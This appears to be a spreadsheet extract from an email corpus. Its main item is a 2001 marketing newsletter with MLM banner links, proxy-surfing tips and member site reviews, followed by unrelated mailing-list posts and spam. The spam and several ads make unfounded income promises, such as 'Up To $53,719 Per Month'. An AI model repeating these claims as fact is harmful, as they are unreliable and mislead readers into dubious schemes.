 This email has been sent to jm@netnoteinc.com at your 
 request, by Your Membership Newsletter Services.
 Visit our Subscription Center to edit your interests or unsubscribe.
 http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.a4dfur67&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com
 View our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp
 Powered by 
 Constant Contact(R)
 www.constantcontact.com
 --1074482631.993802752000.JavaMail.RovAdmin.rovweb002
 Content-Type: text/html; charset=iso-8859-1
 &lt;HTML&gt;
 &lt;!-- 
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;HTML-FORMATTED MESSAGE BELOW
 The remainder of this message is in HTML format for use by email
 clients that can properly display it.   If you are seeing this message,
 it is because your email client cannot properly display HTML.  You can
 ignore the HTML code you will see below.
  --&gt;
 &lt;head&gt;
 	&lt;title&gt;Your Membership Exchange&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;IMG SRC="http://ccprod.roving.com/roving/sa/o.jsp?id=bd7n7877.a4dfur67&amp;o=http://ccprod.roving.com/roving/images/p1x1.gif" WIDTH=1 HEIGHT=1 alt=" "&gt;
 &lt;!--  Do NOT delete previous line if you want to get statistics on the number of opened emails  --&gt;
 &lt;center&gt;
 &lt;!-- Begin Logo Include --&gt;
 &lt;!-- START CONDITIONAL HTML HIDING 
             &lt;img src="" border="0" vspace="2" alt=""&gt;
  END OF CONDITIONAL HTML HIDING --&gt; 
 &lt;!-- End Logo Include --&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="575"&gt;
 &lt;tr&gt;
 	&lt;td width="25"&gt;&lt;img src="http://ccprod.roving.com/roving/images/letters/gray-corner-tl.gif" width="25" height="25" border="0" alt=""&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#666666"&gt;&lt;/td&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- Begin Title Row --&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#CCCCCC"&gt;&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="5" color="#870000"&gt;Your Membership Exchange, Issue #423&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- End Title Row --&gt;
 &lt;!-- Begin Date String Row --&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#CCCCCC" align="right"&gt;&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="2" color="#000000"&gt;June 28, 2001&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- End Date String Row --&gt;
 &lt;tr&gt;
 	&lt;td width="575" colspan="3" height="1" bgcolor="#666666"&gt;&lt;img src="http://ccprod.roving.com/roving/images/letters/spacer.gif" width="1" height="1" border="0" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#870000"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#FFFFFF"&gt;
 	&lt;!-- Begin Content Table --&gt;
 	&lt;table border="0" cellpadding="6" cellspacing="0" width="100%"&gt;
 	&lt;tr&gt;
 		&lt;td width="100%"&gt;
 		&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="2" color="#000000"&gt;
 		&lt;!-- Begin Greeting --&gt;
 		Your place to exchange ideas, ask questions, swap links, and share your skills!
 		&lt;!-- End Greeting --&gt;
 		&lt;!-- Begin Letter Body --&gt;
 		&lt;p&gt;You are a member in at least one of these programs 
 - You should be in them all! 
 &lt;a href="BannersGoMLM.com"&gt; BannersGoMLM.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="ProfitBanners.com"&gt; ProfitBanners.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="CashPromotions.com"&gt; CashPromotions.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="MySiteInc.com"&gt; MySiteInc.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="TimsHomeTownStories.com"&gt; TimsHomeTownStories.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="FreeLinksNetwork.com"&gt; FreeLinksNetwork.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="MyShoppingPlace.com"&gt; MyShoppingPlace.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="BannerCo-op.com"&gt; BannerCo-op.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="PutPEEL.com"&gt; PutPEEL.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="PutPEEL.net"&gt; PutPEEL.net &lt;/a&gt;&lt;br&gt;
 &lt;a href="SELLinternetACCESS.com"&gt; SELLinternetACCESS.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="Be-Your-Own-ISP.com"&gt; Be-Your-Own-ISP.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="SeventhPower.com"&gt; SeventhPower.com &lt;/a&gt;
 &lt;p&gt;______________________________________________________&lt;br&gt;
 Today's Special Announcement:&lt;p&gt;
 I'll Put Your Ad on 2,000 Sites FREE! Free This Week Only, 
 Just For Our Subscribers! Learn the secrets of marketing 
 online on this global FREE teleseminar. Limited lines 
 available, only three time slots available... reserve today. 
 You will not be disappointed! I'll be your personal host. 
 We operate several sites, all successful. I'll teach you what 
 to do and how to do it! Click here: 
 &lt;a href="http://bannerco-op.com/freeseminar/ezine"&gt;FREE Teleseminar&lt;/a&gt;
 Michael T. Glaspie - Founder
 		&lt;p&gt;______________________________________________________&lt;br&gt;
 We apologize for any technical problems you may have had with
 our last mailing, we are working hard to ensure that such problems 
 will not occur again.&lt;p&gt;
 In This Issue:&lt;p&gt;
 &lt;b&gt;&gt;&gt; Q &amp; A &lt;/b&gt;&lt;br&gt;
 &lt;b&gt;    QUESTIONS: &lt;/b&gt;&lt;br&gt;
      - Using pictures as links? &lt;br&gt;
 &lt;b&gt;    ANSWERS: &lt;/b&gt;&lt;br&gt;
      - Unblocking sites so I can access? &lt;br&gt;
        Z. OConan: Access using a proxy &lt;br&gt;
        G. Bendickson: Using A Proxy To Visit Blocked Sites &lt;p&gt;
 &lt;b&gt;&gt;&gt; MEMBER SHOWCASES&lt;/b&gt; &lt;p&gt;
 &lt;b&gt;&gt;&gt; MEMBER *REVIEWS* &lt;/b&gt;&lt;br&gt;
      - Sites to Review: #124, #125 &amp; #126! &lt;br&gt;
      - Site #123 Reviewed! &lt;br&gt;
      - Vote on Your Favorite Website Design! &lt;br&gt;
 &lt;p&gt;
 ______________________________________________________&lt;br&gt;
 &lt;b&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; QUESTIONS &amp; ANSWERS &lt;&lt;&lt;&lt;&lt;&lt;&lt; &lt;/b&gt;&lt;p&gt;
 &lt;i&gt;Do you a burning question about promoting your website, html design, 
 or anything that is hindering your online success? Submit your questions
 to &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput&lt;/a&gt;&lt;br&gt;Are you net savvy? Have you learned from your own trials and errors and 
 are willing to share your experience? Look over the questions each day, 
 and if you have an answer or can provide help, post your answer to 
 &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;  Be sure to include your signature 
 file so you get credit (and exposure to your site). &lt;/i&gt;&lt;p&gt;
 &lt;b&gt;QUESTIONS: &lt;/b&gt;&lt;p&gt;
 From: moviebuff@cliffhanger.com &lt;br&gt;
 Subject: Using pictures as links &lt;p&gt;
 I'm changing my website and want to use pictures for the links to other pages. 
 But, someone told me I should still put a 'click here' underneath all the 
 pictures. To me, this removes all purpose of using the pictures.  &lt;p&gt;
 How can I get across that you click on the pictures to get to other pages 
 without coming right out and saying so? For example, I have a page with 
 actor and actress information and just want to have a picture of my 
 favorite stars to click on and change the picture every couple of days. &lt;p&gt;
 Mark &lt;br&gt;
 moviebuff@cliffhanger.com &lt;br&gt;
 &lt;p&gt;
 &lt;b&gt;ANSWERS:&lt;/b&gt;&lt;p&gt;
 From: Zaak  - Zaako@linkpaks.com &lt;br&gt;
 Subject: Access using a proxy &lt;p&gt;
 &gt;From: CJ  (cj5000@post.com) &lt;br&gt;
 &gt;Subject: Unblocking sites so I can access? (Issue #422) &lt;p&gt;
 --&gt; I am currently living in a place where the ISP is 
 blocking 50% of 
 the web. I was told by someone that you can unblock these web sites by 
 using a proxy, but I don't know what that means. I am wondering is 
 there a way to get access to these sites? -- &lt;br&gt;
 &lt;p&gt;
 A proxy is easy to use if you use someone elses, they can be tricky to setup yourself. 
 I have had very good results with Surfola. Basically you surf to their servers and then 
 from there you surf Through/From their servers. I have several places I surf from that 
 block content. Surfola easily bypasses them! Its also Free! You can also make money 
 with them but I just use them to bypass anal retentive ISP/Corporate providers and 
 because they allow me to surf anonymously! &lt;p&gt;
 I have a detailed right-up on them at &lt;a href="http://linkpaks.com/paidtosurf/Surfola.php"&gt; http://linkpaks.com/paidtosurf/Surfola.php &lt;/a&gt;
 See there for more info. If anything is not clear feel free to ask. 
 (Email &amp; Sign-up Links on http://linkpaks.com/paidtosurf/Surfola.php page) &lt;p&gt;
 Zaak OConan &lt;br&gt;
 Netrepreneur &lt;br&gt;
 &lt;a href="Http://LinkPaks.com"&gt;Http://LinkPaks.com&lt;/a&gt; - Surf &amp; Earn Guides &lt;br&gt;
 &lt;a href="Http://LinktoCash.com"&gt;Http://LinktoCash.com&lt;/a&gt; - Internet Businesses for under $100 &lt;br&gt;
 &lt;a href="Http://ITeam.ws"&gt;Http://ITeam.ws&lt;/a&gt; - The Hottest Product on the Net Today &lt;p&gt;
 ++++ &lt;b&gt;Next Answer - Same Question&lt;/b&gt; ++++ &lt;p&gt;
 From: Wyn Publishing - wynpublishing@iname.com &lt;br&gt;
 Subject: Using A Proxy To Visit Blocked Sites &lt;p&gt;
 &gt;From: CJ  (cj5000@post.com) &lt;br&gt;
 &gt;Subject: Unblocking sites so I can access? (Issue #422) &lt;p&gt;
 CJ, &lt;p&gt;
 Two such sites that allows proxy surfing are: &lt;br&gt;
 http://www.anonymise.com and
 http://www.anonymizer.com . &lt;p&gt;
 However, if you cannot get to that site then obviously it will not work. 
 Also note, that if your ISP is dictating to you which sites you may or 
 may not visit, then it is time to change providers! &lt;p&gt;
 Gregory Bendickson, Wyn Publishing &lt;br&gt;
 Over 28 Free Traffic exchange services reviewed in a fully &lt;br&gt;
 customizable e-book. Download yours free and get multiple &lt;br&gt;
 signups while learning the art of free web traffic! &lt;br&gt;
 &lt;a href="http://www.trafficmultipliers.com"&gt;http://www.trafficmultipliers.com&lt;/a&gt; &lt;p&gt;
 		&lt;p&gt;______________________________________________________ &lt;p&gt;
 &gt;&gt;&gt;&gt;&gt;&gt;&gt; &lt;b&gt;WEBSITE SHOWCASES&lt;/b&gt; &lt;&lt;&lt;&lt;&lt;&lt;&lt; &lt;p&gt;
 &lt;i&gt;Examine carefully - those with email addresses included WILL 
 trade links with you, you are encouraged to contact them. And, there 
 are many ways to build a successful business. Just look at these 
 successful sites/programs other members are involved in... &lt;/i&gt;&lt;p&gt;
 ----------------------------------------------------- &lt;p&gt;
 "It's The Most D-A-N-G-E-R-O-U-S Book on the Net"
 Email 20,000 Targeted Leads Every Single Day! Slash Your 
 Time Online to just 1-2 Hours Daily! Build 11 Monthly Income 
 Streams Promoting ONE URL! Start building YOUR Business - 
 NOT everyone elses! &lt;a href="http://www.roibot.com/w.cgi?R8901_bd_shwc"&gt; http://www.roibot.com/w.cgi?R8901_bd_shwc&lt;/a&gt; &lt;br&gt;
 ----------------------------------------------------- &lt;p&gt;
 Is your website getting traffic but not orders?
 Profile, Analyze, Promote, and Track your site to 
 get the results you want. Fully Guaranteed!
 Free Trial Available! &lt;a href="http://www.roibot.com/w.cgi?R4887_saa"&gt; http://www.roibot.com/w.cgi?R4887_saa&lt;/a&gt; &lt;br&gt;
 ------------------------------------------------------&lt;p&gt;
 OVER 7168 SITES TO PLACE YOUR FREE AD! 
 Get immediate FREE exposure on thousands of sites. 
 Plus two FREE programs that will AUTOMATICALLY type 
 your ad for you! Pay one time, promote all the time.
 &lt;a href="http://www.hitekhosting.net/cgi-bin/club_click.cgi?ID2932"&gt; http://www.hitekhosting.net/cgi-bin/club_click.cgi?ID2932&lt;/a&gt; &lt;br&gt;
 ----------------------------------------------------- &lt;p&gt;
 &lt;i&gt;If you have a product, service, opportunity and/or quality 
 merchandise that appeals to people worldwide, reach your 
 target audience! 
 For a fraction of what other large newsletters charge you 
 can exhibit your website here for only $8 CPM. Why?... 
 Because as a valuable member we want you to be successful! 
 Order today - Exhibits are limited and published on a 
 first come, first serve basis. &lt;/i&gt;&lt;a href="http://bannersgomlm.com/ezine"&gt; http://bannersgomlm.com/ezine &lt;/a&gt; &lt;br&gt;
 &lt;p&gt;
 ______________________________________________________&lt;br&gt;
 &gt;&gt;&gt;&gt;&gt;&gt;&gt; &lt;b&gt;MEMBER *REVIEWS*&lt;/b&gt; &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;p&gt;
 &lt;i&gt;Visit these sites, look for what you like and any suggestions 
 you can offer, and send your critique to &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt; 
 And, after reviewing three sites, your web site will be added to 
 the list! It's fun, easy, and it's a great opportunity to give 
 some help and receive an informative review of your own site. 
 Plus, you can also win a chance to have your site chosen for 
 a free website redesign. One randomly drawn winner each month! &lt;/i&gt;&lt;p&gt;
 &lt;b&gt;SITES TO REVIEW:&lt;/b&gt;&lt;p&gt;
 Site #124: &lt;a href="http://www.BestWayToShop.com"&gt;http://www.BestWayToShop.com&lt;/a&gt;&lt;br&gt;
 Dale Pike &lt;br&gt;
 rhinopez@aol.com &lt;p&gt;
 Site #125: &lt;a href="http://www.wedeliverparties.com"&gt;http://www.wedeliverparties.com&lt;/a&gt;&lt;br&gt;
 Dawn Clemons &lt;br&gt;
 dclemons7@home.com &lt;p&gt;
 Site #126: &lt;a href="http://www.EClassifiedshq.com"&gt;http://www.EClassifiedshq.com&lt;/a&gt; &lt;br&gt;
 Carol Cohen &lt;br&gt;
 Opp0rtunity@aol.com &lt;p&gt;
 		&lt;p&gt;&lt;b&gt;SITE REVIEWED:&lt;/b&gt;&lt;p&gt;
 Comments on Site #123: &lt;a href="http://netsbestinfo.homestead.com/nbi.html"&gt;http://netsbestinfo.homestead.com/nbi.html&lt;/a&gt;&lt;br&gt;
 Dennis &lt;br&gt;
 damorganjr@yahoo.com&lt;br&gt;
 ~~~~&lt;p&gt;
 I reviewed site 123 and found the size of the font to be too aggressive and 
 I don't like mustard yellow for a background. Also in the second or third 
 paragraph is a misspelled word which should be "first-come" not as 
 shown on the page.&lt;p&gt;
 I feel a sample of the type of information offered in the newsletter should 
 be displayed on the page as well as a sample of the free ads offered 
 on the site. I will probably submit a free ad just to see the content of the newsletter.  &lt;p&gt;
 As has been mentioned many times, some information about the person 
 doing the page is always good.  We need some information about 
 why this newsletter will be worthwhile to subscribe to. &lt;br&gt;
 ~~~~&lt;p&gt;
 Dennis - I took a look at your site, and have recommendations 
 for improving your page.&lt;br&gt;
 1- I use Internet Explorer and view web pages with my text size set to 
 'smaller'. The text you used was quite large, like a font used for a heading 
 for all the text. By making the text size smaller it wouldn't feel like 
 you were screaming at me. Also, the background was just too much.&lt;br&gt;
 2- There were spelling errors in the text. Often it might be difficult for you 
 to spot these yourself if you see the page all the time, but have a friend 
 look it over. Spelling errors make the page look unprofessional.&lt;br&gt;
 3- Offer a sample of your newsletter so people can see what it looks like 
 before they subscribe. Also, if you are asking for a person to give you 
 their email address, you MUST have a privacy policy and let them know 
 they can unsubscribe.&lt;br&gt;
 4- Think about adding a form for people to subscribe to the newsletter. 
 It looks more professional than just offering an email address to send to.&lt;br&gt;
 5- Offer information about yourself, and the kinds of information your 
 newsletter contains. Maybe extend your site to include back issues or 
 an archive to see what information you have offered in the past.&lt;br&gt;
 6- Build another page for 'sponsoring info' and put prices on that 
 page. Remove all pricing information from the home page.&lt;br&gt;
 ~~~~&lt;p&gt;
 I feel that the background is a little too bold and busy for the text. 
 I also believe that the text is too large which makes it difficult to read 
 quickly, and forces the reader to scroll down unnecessarily. 
 I noticed some spelling errors, and I think that a link to the classifieds 
 site should be provided, and online payments should be accepted. 
 A site that sells advertising should have advertisments on it!&lt;br&gt;
 ~~~~&lt;p&gt;
 This is a very clear site with nothing interfering with the 
 message.  I did not like the background colour, however that is 
 personal, it did not detract from the information.  I was tempted 
 to sign up for the newsletter but would have liked a link to see 
 a current issue. There was an error in the wording (a word 
 missed) which needs correction and I think the fonts could be 
 smaller. Overall a non-confusing site which makes a nice change. *cheers*&lt;br&gt;
 ~~~~&lt;p&gt;
 Could use a better background and the fonts are very large, there also 
 are errors in the following paragraphs : 
 "first com-first serve" and "to place a sponsor advertisement, 
 send your to my email"&lt;br&gt;
 ~~~~&lt;p&gt;
 A single page site. It is necessary to subscribe to the webmaster's 
 newsletter to see what he's doing, and it doesn't seem to me to be 
 a way to get people to visit. I wouldn't, for example. He claims to 
 have lots of tidbits of information that, he says, we probably 
 didn't know, and this is possible, but in my opinion, he would be 
 better served if he at least put some of the things out there for 
 all to see - when the appetite, so to speak, if he want people to 
 subscribe. As it is, I would not bother.&lt;br&gt;
 ~~~~&lt;p&gt;
 What does one expect from a site like netsbestinfo? Some useful 
 resources and some useful tips and also some forms of easy 
 advertisement on the net. But what we get here is a newsletter 
 with the owner (whose email reads damorgarjr@yahoo.com) 
 asking us to subscribe us to his newsletter for a free 4-line ad. 
 He also tells of paid category of advertisements. This is all we get 
 from a site which has a grand title. Even the information about 
 the newsletter is hardly impressive and is presented in about 35-to-40 
 points size which gets difficult to read. &lt;br&gt;
 ~~~~&lt;p&gt;
 A neat enough site but the background could be a little hard on 
 the eyes. There is only really one problem with this page - its 
 just an advertisement for a newsletter. No, scratch that, its an 
 advertisement to place free ads in a newsletter. A bold enough 
 move perhaps but I learned hardly anything about the newsletter 
 itself and immediately started worrying about getting a flood of 
 ads to my email account so I didn't even subscribe. Presumably 
 you'd want to get people to sign up so might I suggest splitting 
 the page into the newsletter itself, perhaps a sample issue, 
 a privacy policy and a promise not to drown in ads and then click 
 for more info on your free ads. &lt;p&gt;
 ________________________________________&lt;br&gt;
 &lt;b&gt;VOTE ON YOUR FAVORITE WEBSITE DESIGN!&lt;/b&gt;&lt;br&gt;
 Help out the winner of the free website redesign by voting for 
 YOUR favorite!  &lt;p&gt;
 You can help out Teddy at &lt;a href="http://www.links4profit.com"&gt; links4profit.com&lt;/a&gt; by taking a 
 look at his site, then checking out the three new layouts Jana of 
 AkkaBay Designs &lt;a href="http://AkkaBay.com"&gt;AkkaBay.com&lt;/a&gt; has designed specifically 
 for him.  After you've visited all three, vote for your favorite. 
 To make this as easy as possible for you, just click on the e-mail 
 address that matches your choice - you do not need to enter 
 any information in the subject or body of the message.&lt;p&gt;
 I have included a note from Jana, and the links to Teddy's  
 current site along with the three new designs:&lt;p&gt;
 &gt;From Jana: The pages have been created as non-frame pages 
 although with minor modification, the pages could be adapted 
 for use in a frames environment&lt;p&gt;
 Please take a look at the existing site: &lt;a href="http://www.links4profit.com"&gt;http://www.links4profit.com&lt;/a&gt;&lt;p&gt;
 Here are the 3 redesigns: &lt;p&gt;
 &lt;a href="http://AkkaBay.com/links4profit/index.html"&gt;http://AkkaBay.com/links4profit/index.html&lt;/a&gt;&lt;br&gt;
 Vote for this design:  &lt;a href="mailto:design1@AEOpublishing.com"&gt;design1@AEOpublishing.com&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://AkkaBay.com/links4profit/index2.html"&gt;http://AkkaBay.com/links4profit/index2.html&lt;/a&gt;&lt;br&gt;
 Vote for this design:  &lt;a href="mailto:design2@AEOpublishing.com"&gt;design2@AEOpublishing.com&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://AkkaBay.com/links4profit/index3.html"&gt;http://AkkaBay.com/links4profit/index3.html&lt;/a&gt;&lt;br&gt;
 Vote for this design:  &lt;a href="mailto:design3@AEOpublishing.com"&gt;design3@AEOpublishing.com&lt;/a&gt;&lt;p&gt;
 You will have all of this week to vote (through June 29), and 
 we'll list the favorite and most voted for layout next week.  
 Teddy of course will be able to choose his favorite, and 
 colors, font style/size, backgrounds, textures, etc, can all 
 easily be changed on the "layout" that he likes. 
 &lt;p&gt;
 Free website re-designs and original graphics are provided to 
 FLN Showcase winners courtesy of AkkaBay Designs. 
 &lt;a href="http://AkkaBay.com"&gt; http://AkkaBay.com &lt;/a&gt;&lt;p&gt;
 If you have any questions about how this works or how you can 
 participate, please email Amy at &lt;a href="mailto:Moderator@AEOpublishing.com&gt; Moderator &lt;/a&gt;&lt;p&gt;
 		&lt;p&gt;______________________________________________________&lt;br&gt;
 moderator:Amy Mossel &lt;br&gt;
 posting: &lt;a href="MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;&lt;br&gt;
 ______________________________________________________&lt;br&gt;
 ______________________________________________________&lt;br&gt;
 Send posts and questions (or your answers) to:&lt;br&gt;
   &lt;a href="MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;&lt;br&gt;
 Please send suggestions and comments to:&lt;br&gt;
   &lt;a href="mailto:Moderator@AEOpublishing.com"&gt;Moderator@AEOpublishing.com&lt;/a&gt;&lt;p&gt;
 To change your subscribed address, send both new 
 and old address to &lt;a href="mailto:Moderator@AEOpublishing.com"&gt;Moderator@AEOpublishing.com&lt;/a&gt;&lt;br&gt;
 See below for unsubscribe instructions.&lt;br&gt;
 Copyright 2001 AEOpublishing &lt;br&gt;
 -----End of Your Membership Exchange&lt;p&gt;
 		&lt;!-- End Letter Body --&gt;
 		&lt;!-- Begin Signature  --&gt;
 		&lt;p&gt;
 		&lt;p&gt;
 		&lt;br&gt;
 		&lt;hr width="60%" size="1" align="left" NOSHADE&gt;
 		&lt;br&gt;
 		&lt;!-- End Signature  --&gt;
 		&lt;/font&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;!-- End Content Table --&gt;
 	&lt;/td&gt;
 	&lt;td width="25" bgcolor="#870000"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- Begin Phone Number Row --&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#870000"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#870000" align="right"&gt;&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="1" color="#FFFFFF"&gt; &lt;/font&gt;&lt;/td&gt;
 	&lt;td width="25"&gt;&lt;img src="http://ccprod.roving.com/roving/images/letters/red-corner-br.gif" width="25" height="25" border="0" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- End Phone Number Row --&gt;
 &lt;tr&gt;
 	&lt;td colspan="3" bgcolor="#FFFFFF" align="center"&gt;
 	&lt;!--  You are required by your Constant Contact user agreement to
       provide the opt-out link shown below as by the property 'OptOut' --&gt;
 	&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="1"&gt;
 	&lt;br&gt;This email was sent to jm@netnoteinc.com, at your request, by &lt;a href="http://ccprod.roving.com/roving/sa/s.jsp?id=bd7n7877.a4dfur67"&gt;Your Membership Newsletter Services&lt;/a&gt;.  
 	&lt;br&gt;Visit our Subscription Center to &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.a4dfur67&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;edit&lt;/a&gt; your interests or &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.a4dfur67&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;unsubscribe&lt;/a&gt;.
 	&lt;br&gt;View our &lt;a href="http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp"&gt;privacy policy&lt;/a&gt;.
 	&lt;p&gt;Powered by
 	&lt;br&gt;&lt;a href="http://www.constantcontact.com/index.jsp?cc=ctrlr" target="_blank"&gt;&lt;img src="http://ccprod.roving.com/roving/images/cc-logo-color-sm.gif" border="0" alt="Constant Contact"&gt;&lt;/a&gt;
 	&lt;/font&gt;
 	&lt;!-- end opt-out area --&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --1074482631.993802752000.JavaMail.RovAdmin.rovweb002--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Adv: Global Opportunity/Up To $53,719 Per Month!                                          8741yt-6
</t>
  </si>
  <si>
    <t xml:space="preserve">Proven 6 Year Old Better Business Registered Company Provides 
 A REAL And Legitimate Opportunity To Make Some SERIOUS MONEY!
 GLOBAL OPPORTUNITIES! (Around The World)
 No Selling!			
 No Phone Calls!			
 No Recruiting!
 No Meetings To Attend!
 80% Pay Out!  (No Kidding)
 PAYS WEEKLY!
 Spillover, Spillover, Spillover, From Our Massive Advertising Programs!!
 Membership Includes, Immediate FREE Money Making Website!
 NO EXPERIENCE REQUIRED...ALL YOU NEED TO DO IS ENROLL...
 ANYONE CAN DO THIS...THAT MEANS ANYONE!
                                                                                                                                                         ANYONE CAN DO THIS!
 Check out: http://www.worldbizservices.net/money/retire
 Will Also Receive Information On a NEW Ground Floor Program!!
 Earn $100, $200, $400, $800, $1600, $3200, $6400, Ect. Per Month!
 ALSO PAYS WEEKLY! (100% GUARANTEED)
 -----------------------------------------------------------------------------------------------------------------
 "You are receiving this e-mail because you have purchased something online
  or signed up for information over the last 6 months. If you would like to be
  removed  from this list send an e-mail to mresidual3@excite.com, and put
 remove in the subject line."
 2693CYCh6-467VCaV9333LtvW4-049ChsA2496Lhcg4-87l43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</si>
  <si>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[SAtalk] O.T. Habeus -- Why?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I think I've worked on SA enough to understand that I can localize a
 &gt; score.  I'm just not comfortable with using SpamAssassin as a vehicle
 &gt; for drumming up your business at the expense of our user base.
 This is exactly what I think. SpamAssassin has always been conservative
 about adding unproven RBLs and such, and this should be the same.
 &gt; I think it would make more sense to start Habeas with a less aggressive
 &gt; score (one which will not give spammers a quick path into everyone's
 &gt; inbox) and after we've seen evidence that the system works, then we can
 &gt; increase the magnitude of the score.
 I say start it with a zero score and put it in 70_cvs_rules_under_test like
 any other unproven rule. Then score it based on actual results, not
 promises. My corpus does not yet contain a single non-spam (or spam) message
 with a Habeas mark. Based on that, it doesn't impress me and it wouldn't
 impress the GA either. Rules with exactly the same statistics are being
 dropped from SA right now, and I don't see why this should be any different.
 --
 Michael Moncur  mgm at starlingtech.com  http://www.starlingtech.com/
 "Furious activity is no substitute for understanding." --H. H. Williams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</si>
  <si>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TV sports babe in trouble for locker room antics
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8421063,1717/
 Date: 2002-10-01T06:32:13+01:00
 (Some TV Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 7 Oct 2002 19:28:51 +0200
 Matthias Saou &lt;matthias@rpmforge.net&gt; wrote:
 # I've never heard of any CD-ROM or DVD-ROM drive having problems with
 # DMA... although there probably is since Red Hat decided to default
 # disabling it a few releases back :-/
 When I worked as a PC repair tech for a Computer store chain, I did
 run across quite a few DVD drives that would lock up if DMA was
 enabled.  It's more of a chipset/drive problem than a Drive by itself.
 -- 
 Jesse Keating
 j2Solutions.net
 Mondo DevTeam (www.mondorescue.org)
 Was I helpful?  Let others know:
  http://svcs.affero.net/rm.php?r=jkeating
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Problem with an rpm...
</t>
  </si>
  <si>
    <t xml:space="preserve">Hiya, I just myself an rpm, and when I did -Uvh to upgrade the earlier 
 version I had installed (also from my rpm) I got:
 [root@spawn i386]# rpm -Uvh mulberry-2.2-b1.i386.rpm
 Preparing...                ########################################### 
 [100%]
    1:mulberry               ########################################### 
 [100%]
 error: db3 error(-30998) from db-&gt;close: DB_INCOMPLETE: Cache flush was 
 unable to complete
 Whats the DB_INCOMPLETE mean?
 It all seems to have installed ok thou...
                                     -- \m/ --
   "...if I seem super human I have been misunderstood." (c) Dream Theater
          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: CVS report
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; &gt; &gt; &gt; Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow on 
 &gt; &gt; &gt; &gt; large (&gt;100 msgs) unseen sequences. Anybody else having this problem?
 &gt; &gt; &gt; 
 &gt; &gt; &gt; I'll take the blame.
 &gt; &gt; &gt; 
 &gt; &gt; &gt; The reason, I suspect, is that we're needlessly reading the .sequences file 
 &gt; &gt; &gt; multiple times because of other sequences.  I need to make the code much 
